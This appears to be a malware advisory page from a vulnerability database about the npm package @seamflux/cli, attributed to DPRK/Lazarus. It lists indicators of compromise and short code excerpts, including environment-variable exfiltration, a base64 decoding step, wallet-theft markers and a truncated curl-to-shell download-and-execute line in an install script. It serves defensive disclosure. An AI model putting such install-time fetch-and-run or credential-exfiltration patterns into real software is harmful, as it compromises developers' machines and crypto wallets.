VDB

GCVE-110-OSM-2026-1521

GCVE-110-OSM-2026-1521
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 7, 2026
APT malware detected: chai-max. Associated with threat actor(s): DPRK/Lazarus. Behaviors: data exfiltration, network activity, obfuscated code, install-time execution. Payload: dist/index.js Key findings: - Environment Variable Exfiltration in dist/index.js: "process.env.no_proxy; if (!raw) return false; for (const part of raw.spl..." - Escaped Protocol Pattern in dist/index.js: ""://"" - Chai-Max Wallet Theft Indicators in dist/index.js: "SOLANA_METHODS, SOLANA_EVENTS, DEFAULT_STORAGE_PATH, SEAMFLUX_WC_STORAGE_PATH_EN..." - Download and Execute in scripts/install-bun.js: "curl + bash return { cmd: "sh", args: ["-c", "curl -fsSL https:/..." - Dynamic Base64 Decoding in dist/index.js: "Buffer.from(encryptedData, "base64")" IOCs: - urls: https://sui-rpc.publicnode.com`;, https://app.seamflux.ai, https://seamflux.ai, https://walletconnect.network, https://app.seamflux.ai/connections. (+13 more) - domains: sui-rpc.publicnode.com, walletconnect.network, out.to, cfg.id, archive.prod.nado.xyz (+9 more) - ethereumAddresses: 0x05ec92d78ed421f3d3ada77ffde167106565974e, 0xaacFeEa03eb1561C4e67d661e40682Bd20E3541b, 0x0000000000000000000000000000000000000000, 0x1924b8561eeF20e70Ede628A296175D358BE80e5 - payloadFileHash: 995f00412717556afbe2f694aa8af8f6642c4234e6b25dbd4354712b65d5f5df

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@seamflux/cliall (affected)

References

vendor

Browse GCVE Records

73,044 records in the GCVE database · Updated July 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›